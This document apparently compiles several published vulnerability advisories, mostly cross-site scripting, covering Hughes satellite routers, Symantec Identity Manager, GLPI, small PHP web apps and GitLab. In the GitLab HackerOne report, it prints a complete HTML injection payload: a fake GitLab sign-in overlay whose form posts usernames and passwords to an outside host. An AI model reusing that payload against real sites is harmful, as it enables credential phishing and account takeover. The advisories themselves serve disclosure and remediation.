Cross Site Scripting (XSS) vulnerability in Hughes Network Systems Router Terminal for HX200 v8.3.1.14, HX90 v6.11.0.5, HX50L v6.10.0.18, HN9460 v8.2.0.48, and HN7000S v6.9.0.37, allows unauthenticated attackers to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application.

Title: Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting  
Advisory ID: ZSL-2022-5743  
Type: Local/Remote  
Impact: Security Bypass, Exposure of Sensitive Information, Cross-Site Scripting  
Risk: (4/5)  
Release Date: 28.12.2022

**Summary**

The HX200 is a high-performance satellite router designed to provide carrier-grade IP services using dynamically assigned high-bandwidth satellite IP connectivity. The HX200 satellite router provides flexible Quality of Service (QoS) features that can be tailored to the network applications at each individual remote router, such as Adaptive Constant Bit Rate (CBR) bandwidth assignment to deliver high-quality, low jitter bandwidth for real-time traffic such as Voice over IP (VoIP) or videoconferencing. With integrated IP features including RIPv1, RIPv2, BGP, DHCP, NAT/PAT, and DNS Server/Relay functionality, together with a high-performance satellite modem, the HX200 is a full-featured IP Router with an integrated high-performance satellite router. The HX200 enables high- performance IP connectivity for a variety of applications including cellular backhaul, MPLS extension services, virtual leased line, mobile services and other high-bandwidth solutions.

**Description**

The router contains a cross-frame scripting via remote file inclusion vulnerability that may potentially be exploited by malicious users to compromise an affected system. This vulnerability may allow an unauthenticated malicious user to misuse frames, include JS/HTML code and steal sensitive information from legitimate users of the application.

**Vendor**

Hughes Network Systems, LLC - https://www.hughes.com

**Affected Version**

HX200 v8.3.1.14  
HX90 v6.11.0.5  
HX50L v6.10.0.18  
HN9460 v8.2.0.48  
HN7000S v6.9.0.37

**Tested On**

WindWeb/1.0

**Vendor Status**

N/A

**PoC**

hughes\_rfi\_xfs.js  
speedtest.html

**Credits**

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk\>

**References**

\[1\] https://packetstormsecurity.com/files/170343/  
\[2\] https://forum.it.mk/threads/hughes-satellite-router-remote-file-inclusion-cross-frame-scripting.82755/  
\[3\] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22971  
\[4\] https://nvd.nist.gov/vuln/detail/CVE-2023-22971

**Changelog**

\[28.12.2022\] - Initial release  
\[29.12.2022\] - Added reference \[1\] and \[2\]  
\[26.01.2023\] - Added reference \[3\] and \[4\]

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

CVE-2023-22971: Zero Science Lab » Hughes Satellite Router Remote File Inclusion Cross-Frame Scripting

An authenticated user can supply malicious HTML and JavaScript code that will be executed in the client browser.

Menu

*   Products
*   Solutions
*   Support and Services
*   Company
*   How To Buy

Register Login

Multiple Vulnerabilities in Symantec Identity Manager

Product/Component

CA Identity Governance

3 more products

List of Products

4 Products

*   CA Identity Governance
*   CA Identity Manager
*   CA Identity Portal
*   CA Identity Suite

Notification Id

21174

Last Updated

25 January 2023

Initial Publication Date

20 January 2023

Status

CLOSED

Severity

HIGH

CVSS Base Score

8.1

WorkAround

Affected CVE

**Summary**

This security advisory covers below vulnerabilities in Symantec Identity Manager

*   Multiple Reflected Cross-Site Scripting in Identity Manager
*   Response Splitting in Identity Manager
*   Oracle LDAP Attribute Information Disclosure in Identity Manager

**Affected Product(s)**

**Identity Governance And Administration-Identity Manager**

**CVE**

**Supported Version(s)**

**Remediation**

CVE-2023-23949

14.3 CP3  
14.4.1  
14.4.2

Customers who are on 14.3 CP3,14.4 CP1(CHF2) and 14.4 CP2 can apply the hotfixes (link in the 'References' section)

**Identity Governance And Administration-Identity Manager**

**CVE**

**Supported Version(s)**

**Remediation**

CVE-2023-23950

14.3 CP3  
14.4.1  
14.4.2

Customers who are on 14.3 CP3,14.4 CP1(CHF2) and 14.4 CP2 can apply the hotfixes (link in the 'References' section)

**Identity Governance And Administration-Identity Manager**

**CVE**

**Supported Version(s)**

**Remediation**

CVE-2023-23951

14.3 CP3  
14.4.1  
14.4.2

Customers who are on 14.3 CP3,14.4 CP1(CHF2) and 14.4 CP2 can apply the hotfixes (link in the 'References' section)

**Issue Details**

**CVE-2023-23949**

**Severity / CVSS v3.1:**

High / 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)

**References:**

NVD: CVE-2023-23949

**Impact:**

Multiple Reflected Cross-Site Scripting

**Description:**

An authenticated user can supply malicious HTML and JavaScript code that will be executed in the client browser

**CVE-2023-23950**

**Severity / CVSS v3.1:**

High / 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)

**References:**

NVD: CVE-2023-23950

**Impact:**

Response Splitting

**Description:**

User’s supplied input (usually a CRLF sequence) can be used to split a returning response into two responses

**CVE-2023-23951**

**Severity / CVSS v3.0:**

Medium / 4.3 (AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

**References:**

NVD: CVE-2023-23951

**Impact:**

Oracle LDAP Attribute Information Disclosure

**Description:**

Ability to enumerate the Oracle LDAP attributes for the current user by modifying the query used by the application

**Acknowledgements**

*   CVE-2023-23949: Christopher Vella of CyberCX
*   CVE-2023-23950: Christopher Vella of CyberCX
*   CVE-2023-23951: Christopher Vella of CyberCX

**References**

IGA 14.4:

*   *   Non-vApp: https://techdocs.broadcom.com/us/en/symantec-security-software/identity-security/identity-manager/14-4/Release-Notes/Hotfixes.html
    *   vApp: https://techdocs.broadcom.com/us/en/symantec-security-software/identity-security/identity-suite/14-4/release-notes/Virtual-Appliance-Release-Notes/Hotfixes.html

IGA 14.3:

*   *   Non-Vapp: https://techdocs.broadcom.com/us/en/symantec-security-software/identity-security/identity-manager/14-3/Release-Notes/Hotfixes.html
    *   VApp: https://techdocs.broadcom.com/us/en/symantec-security-software/identity-security/identity-suite/14-3/release-notes/Virtual-Appliance-Release-Notes/Hotfixes.html

**Revisions**

2023-1-20 Initial public release

CVE-2023-23949: Support Content Notification - Support Portal - Broadcom support portal

phpgurukul Doctor Appointment Management System V 1.0.0 is vulnerable to Cross Site Scripting (XSS) via searchdata=.

\[Suggested description\]

Doctor Appointment Management System V 1.0.0 is vulnerable

\> to Cross Site Scripting (XSS) via searchdata=.

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://phpgurukul.com/

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Doctor Appointment Management System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> searchdata=

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://phpgurukul.com/projects/Doctor-Appointment-System\_PHP.zip

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Rajeshwar Singh

Use CVE-2022-46128.

CVE-2022-46128: CVE/2022-46128 at main · Rajeshwar40/CVE

Sourcecodester.com Online Graduate Tracer System V 1.0.0 is vulnerable to Cross Site Scripting (XSS).

\[Suggested description\]

\> Sourcecodester.com Online Graduate Tracer System V 1.0.0 is vulnerable

\> to Cross Site Scripting (XSS).

\>

\> ------------------------------------------

\>

\> \[Vulnerability Type\]

\> Cross Site Scripting (XSS)

\>

\> ------------------------------------------

\>

\> \[Vendor of Product\]

\> https://www.sourcecodester.com

\>

\> ------------------------------------------

\>

\> \[Affected Product Code Base\]

\> Online Graduate Tracer System - V 1.0.0

\>

\> ------------------------------------------

\>

\> \[Affected Component\]

\> name=

\>

\> ------------------------------------------

\>

\> \[Attack Type\]

\> Local

\>

\> ------------------------------------------

\>

\> \[Impact Code execution\]

\> true

\>

\> ------------------------------------------

\>

\> \[Reference\]

\> https://www.sourcecodester.com/sites/default/files/download/oretnom23/tracking.zip

\>

\> ------------------------------------------

\>

\> \[Discoverer\]

\> Rajeshwar Singh

Use CVE-2022-46957

CVE-2022-46957: CVE/CVE-2022-46957 at main · Rajeshwar40/CVE

GLPI is a Free Asset and IT Management Software package. Versions 0.6.0 and above, prior to 10.0.6 are vulnerable to Cross-site Scripting. This vulnerability allow for an administrator to create a malicious external link. This issue is patched in 10.0.6.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-22725: XSS on external links

A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter.

**\# Exploit Title: Small CRM — Stored Cross-Site Scripting Vulnerability.  
\# Date: 12-Nov-2022  
\# Exploit Author: Venkata Siva Kumar Medituru  
\# Vendor Homepage:** **https://phpgurukul.com/****\# Software Link:** **https://phpgurukul.com/small-crm-php/****\# Version: 3.0  
\# Tested on: Windows 10  
\# Contact:** **https://www.linkedin.com/in/shivakumar-m-v/**

Stored XSS Vulnerability : Cross-site scripting attacks, also called XSS attacks, are a type of injection attack that injects malicious code into specific input fields. If the inputs fields are not validating or not sanitizing the user input then attacker can run malicious script that runs at server side.

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-II XSS.

**Attack vector:  
**This vulnerability can results attacker injecting the XSS payload in the Subject input Field in “Create Ticket” page and each time user visits the “View Ticket” page, the XSS triggers and the attacker can able to steal the cookie according to the crafted payload.

**Vulnerable Parameter:** Subject.

The Reproducive Steps are given in Video PoC.

**Impact:**

XSS may results to Cookie Stealing, Session Hijacking, Redirection, Account Takeovers and many malicious activities will be performed by perpetrators.

**Mitigations:**

01) Implement Web Application Firewall

02) Configure Security Headers that will validate user input and allow the request.

03) Encode user input wherever possible.

CVE-2022-47073: Stored XSS found in Small CRM (phpgurukul) - Shiva Kumar M V - Medium

GLPI is a Free Asset and IT Management Software package. Versions prior to 10.0.6 are subject to Cross-site Scripting via malicious RSS feeds. An Administrator can import a malicious RSS feed that contains Cross Site Scripting (XSS) payloads inside RSS links. Victims who wish to visit an RSS content and click on the link will execute the Javascript. This issue is patched in 10.0.6.

Moderate

trasher published GHSA-x9g4-j85w-cmff

Jan 24, 2023

**Package**

glpi (glpi-project)

**Affected versions**

\>= 10.0.0

**Description**

**Impact**

RSS feeds contents and links are not properly sanitized. Any user that has subscribed to a malicious RSS feed through its personal or through public RSS feeds can be victim of a XSS attack.

**Patches**

Upgrade to 10.0.6

**For more information**

If you have any questions or comments about this advisory, mail us at glpi-security@ow2.org.

**Severity**

**CVSS base metrics**

User interaction

Required

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

**Weaknesses**

**Credits**

CVE-2023-22724: XSS in RSS Description Link

GLPI is a Free Asset and IT Management Software package. Versions 9.4.0 and above, prior to 10.0.6 are subject to Cross-site Scripting. An attacker can persuade a victim into opening a URL containing a payload exploiting this vulnerability. After exploited, the attacker can make actions as the victim or exfiltrate session cookies. This issue is patched in version 10.0.6.

Moderate

trasher published GHSA-352j-wr38-493c

Jan 24, 2023

**Package**

glpi (glpi-project)

**Affected versions**

\>= 9.4.0

**Patched versions**

9.5.12, 10.0.6

**Description**

**Impact**

An attacker can persuade a victim into opening a URL containing a payload exploiting a vulnerability on browse views.

**Patches**

Upgrade to 10.0.6

**For more information**

If you have any questions or comments about this advisory, mail us at glpi-security@ow2.org.

**Severity**

**CVSS base metrics**

User interaction

Required

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N

**Weaknesses**

CVE-2023-22722: XSS on browse views

An issue has been discovered in GitLab EE affecting all versions starting from 15.6 before 15.6.1. It was possible to create a malicious README page due to improper neutralisation of user supplied input.

Skip to content

Open Issue created Nov 21, 2022 by **GitLab SecurityBot@gitlab-securitybot**Reporter

**HTML content injection in README file**

**HackerOne report #1777934** by yvvdwf on 2022-11-18, assigned to @nmalcolm:

Report | How To Reproduce

**Report**

Hi,

**Summary**

Gitlab recently changed the way to render plain text file

    ###  https://gitlab.com/gitlab-org/gitlab/-/blob/053729ecfd3d2b3d2e0ce3618b35cb3c46472897/app/services/markup/rendering_service.rb#L66  
        def plain_unsafe  
          "<pre class=\"plain-readme\">#{text}</pre>"  
        end  

This allows to inject any HTML content. Although the content is then sanitized by Dumpurify via v-safe-html directly. The sanitization allows <form> tag, thus this can be used to popup a login form. If users enter their credential, then their account will be taken over.

I submit this report when considering the ease of exploitation and its impact (although the HTML content injection does not lead to any kind of XSS). Because the content of README file is loaded by default in the main view of a project, attackers may easily trick users to fill their credential in the dummy login form, for example.

**Steps to reproduce**

*   in an existing project or create a new one
*   add a file naming README (please note that no extension here, README.md does not work) with the following content:

    </pre>
    
    <div class="flash-container flash-container-page sticky" data-qa-selector="flash_container">  
       <div class="gl-alert flash-notice gl-alert-info" data-testid="alert-info" role="alert">  
          <svg class="s16 gl-alert-icon gl-alert-icon-no-title" data-testid="information-o-icon"><use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#information-o"></use></svg>  
          <button aria-label="Dismiss" class="btn gl-dismiss-btn btn-default btn-sm gl-button btn-default-tertiary btn-icon js-close" type="button">  
             <svg class="s16" data-testid="close-icon"><use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#close"></use></svg>  
          </button>  
          <div class="gl-alert-content" role="alert">  
             <div class="gl-alert-body">  
                Loading content ...  
             </div>  
          </div>  
       </div>  
    </div>
    
    <style>[@]keyframes fadeIn {99% {visibility: hidden;} 100% { visibility: visible;}</style>
    
    
    <div style="position:fixed!important;top:0px;left:0px;right:0px;bottom:0px;background-color:white;z-index:9999; animation: 3s fadeIn; animation-fill-mode: forwards;visibility: hidden;">  
    <div style="position:fixed!important;top:0px;left:0px;right:0px;bottom:0px;background-color:var(--gray-50)">  
    <div class="page-wrap borderless">  
       <div class="login-page-broadcast">  
       </div>  
       <div class="container navless-container">  
          <div class="content">  
             <div class="flash-container flash-container-page sticky" data-qa-selector="flash_container">  
                <div class="gl-alert flash-alert gl-alert-danger" data-testid="alert-danger" role="alert">  
                   <svg class="s16 gl-alert-icon gl-alert-icon-no-title" data-testid="error-icon">  
                      <use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#error"></use>  
                   </svg>  
                   <button aria-label="Dismiss" class="btn gl-dismiss-btn btn-default btn-sm gl-button btn-default-tertiary btn-icon js-close" type="button">  
                      <svg class="s16" data-testid="close-icon">  
                         <use href="https://gitlab.com/assets/icons-02e23cfb3d83e7293d7b4d2b457f8cd4cb75d3c78cfbedc946bf90bf97c2ed73.svg#close"></use>  
                      </svg>  
                   </button>  
                   <div class="gl-alert-content" role="alert">  
                      <div class="gl-alert-body">  
                         You need to sign in or sign up before continuing.  
                      </div>  
                   </div>  
                </div>  
             </div>  
             <div class="mt-3">  
                <div class="col-sm-12 gl-text-center">  
                   <img alt="GitLab.com" class="gl-w-10 js-lazy-loaded" src="https://gitlab.com/assets/logo-911de323fa0def29aaf817fca33916653fc92f3ff31647ac41d2c39bbe243edb.svg" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                   <h1 class="mb-3 gl-font-size-h2">  
                      GitLab.com  
                   </h1>  
                </div>  
             </div>  
             <div class="mb-3">  
                <div class="gl-w-half gl-xs-w-full gl-ml-auto gl-mr-auto bar">  
                   <div id="signin-container">  
                      <div class="tab-content">  
                         <div class="login-box tab-pane active" id="login-pane" role="tabpanel">  
                            <div class="login-body">  
                               <form class="new_user gl-show-field-errors js-arkose-labs-form" id="new_user" aria-live="assertive" data-testid="sign-in-form" action="https://yvvdwf.me/gl" accept-charset="UTF-8" method="post">  
                                  <input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                                  <div class="form-group gl-px-5 gl-pt-5">  
                                     <label for="user_login" class="label-bold gl-mb-1">Username or email</label>  
                                     <input class="form-control gl-form-input top js-username-field" autofocus="autofocus" autocapitalize="off" autocorrect="off" required="required" title="This field is required." data-qa-selector="login_field" data-testid="username-field" type="text" name="user[login]" id="user_login">  
                                     <p class="gl-field-error hidden">This field is required.</p>  
                                  </div>  
                                  <div class="form-group gl-px-5">  
                                     <label class="label-bold gl-mb-1" for="user_password">Password</label>  
                                     <input class="form-control gl-form-input bottom" autocomplete="current-password" required="required" title="This field is required." data-qa-selector="password_field" data-testid="password-field" type="password" name="user[password]" id="user_password">  
                                     <p class="gl-field-error hidden">This field is required.</p>  
                                  </div>  
                                  <div class="gl-px-5">  
                                     <div class="gl-display-inline-block">  
                                        <div class="gl-form-checkbox custom-control custom-checkbox">  
                                           <input name="user[remember_me]" type="hidden" value="0" autocomplete="off"><input class="custom-control-input" type="checkbox" value="1" name="user[remember_me]" id="user_remember_me">  
                                           <label class="custom-control-label" for="user_remember_me"><span>Remember me</span></label>  
                                        </div>  
                                     </div>  
                                     <div class="gl-float-right">  
                                        <a href="/users/password/new">Forgot your password?</a>  
                                     </div>  
                                  </div>  
                                  <div></div>  
                                  <div>  
                                          
                                     <div data-testid="arkose-labs-challenge" class="gl-display-flex gl-justify-content-center gl-mt-3 gl-mb-n3 js-arkose-labs-container-1" style="display: none;"></div>  
                                       
                                  </div>  
                                  <div class="submit-container move-submit-down gl-px-5">  
                                     <button name="button" type="submit" class="gl-button btn btn-block btn-confirm js-sign-in-button js-no-auto-disable" data-qa-selector="sign_in_button" data-testid="sign-in-button">Sign in</button>  
                                  </div>  
                               </form>  
                            </div>  
                         </div>  
                      </div>  
                      <p class="gl-px-5">  
                         By signing in you accept the <a href="/-/users/terms" target="_blank" rel="noreferrer noopener">Terms of Use and acknowledge the Privacy Policy and Cookie Policy</a>.  
                      </p>  
                      <p class="gl-mt-3 gl-text-center">  
                         Don't have an account yet?  
                         <a data-qa-selector="register_link" href="/users/sign_up">Register now</a>  
                      </p>  
                      <div class="clearfix">  
                         <div class="omniauth-container gl-mt-5 gl-p-5 gl-text-center gl-w-90p gl-ml-auto gl-mr-auto">  
                            <label class="gl-font-weight-normal">  
                            Sign in with  
                            </label>  
                            <div class="gl-display-flex gl-flex-wrap gl-justify-content-center">  
                               <form class="gl-mb-3" method="post" action="/users/auth/google_oauth2"><button id="oauth-login-google_oauth2" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Google" title="Sign in with Google" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/google_64-9ab7462cd2115e11f80171018d8c39bd493fc375e83202fbb6d37a487ad01908.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Google  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/github"><button id="oauth-login-github" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="GitHub" title="Sign in with GitHub" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/github_64-84041cd0ea392220da96f0fb9b9473c08485c4924b98c776be1bd33b0daab8c0.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  GitHub  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/twitter"><button id="oauth-login-twitter" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Twitter" title="Sign in with Twitter" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/twitter_64-22f28114e53ba8324a944fc07b5a5739a78d2a4083d07c0ea2fec2bc1ebfc49d.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Twitter  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/bitbucket"><button id="oauth-login-bitbucket" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Bitbucket" title="Sign in with Bitbucket" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/bitbucket_64-daa496030c0c290748e3c2e50f7464d2f5de0e019cce728930e0508a6dac815c.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Bitbucket  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                               <form class="gl-mb-3" method="post" action="/users/auth/salesforce"><button id="oauth-login-salesforce" class="btn gl-button btn-default gl-ml-2 gl-mr-2 gl-mb-2 js-oauth-login  " type="submit"><img alt="Salesforce" title="Sign in with Salesforce" class="gl-button-icon js-lazy-loaded" src="https://gitlab.com/assets/auth_buttons/salesforce_64-0fb2c008b7c8d627aadda7ec593509e0bd402752df28d8a17b04ac1a30c26ef9.png" loading="lazy" data-qa_selector="js_lazy_loaded_content">  
                                  <span class="gl-button-text">  
                                  Salesforce  
                                  </span>  
                                  </button><input type="hidden" name="authenticity_token" value="" autocomplete="off">  
                               </form>  
                            </div>  
                            <div class="gl-form-checkbox custom-control custom-checkbox">  
                               <input type="checkbox" name="remember_me" id="remember_me" class="custom-control-input">  
                               <label class="custom-control-label" for="remember_me"><span>Remember me  
                               </span></label>  
                            </div>  
                         </div>  
                      </div>  
                   </div>  
                </div>  
             </div>  
          </div>  
       </div>  
       <hr class="footer-fixed">  
       <div class="container footer-container">  
          <div class="footer-links">  
             <a href="/explore">Explore</a>  
             <a href="/help">Help</a>  
             <a href="https://about.gitlab.com">About GitLab</a>  
             <a target="_blank" class="text-nowrap" rel="noopener noreferrer" href="https://forum.gitlab.com">Community forum</a>  
          </div>  
       </div>  
    </div>  

*   save the file, then back to the main page of the project
*   you should see a login popup that appears after 3 seconds which is adjustable.
*   if the form is submited, its target is outside gitlab.com, e.g., https://yvvdwf.me/gl, then the username/password will be leaked

**Impact**

A risk to leak username and password of victims

**Examples**

https://gitlab.com/yvvdwf/dummy-login

**What is the current _bug_ behavior?**

HTML tag in a plain text is not escaped

**What is the expected _correct_ behavior?**

HTML tag in a plain text should be escaped

**Output of checks**

This bug happens on GitLab.com

**Impact**

A risk to leak username and password of victim

**How To Reproduce**

Please add reproducibility information to this section:

**Video**

html-injection

Edited Nov 21, 2022 by Nick Malcolm

CVE-2022-4092: HTML content injection in README file (#383208) · Issues · GitLab.org / GitLab · GitLab

A cross-site scripting (XSS) vulnerability in Doctor Appointment Management System v1.0.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Search function.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

Tag

#xss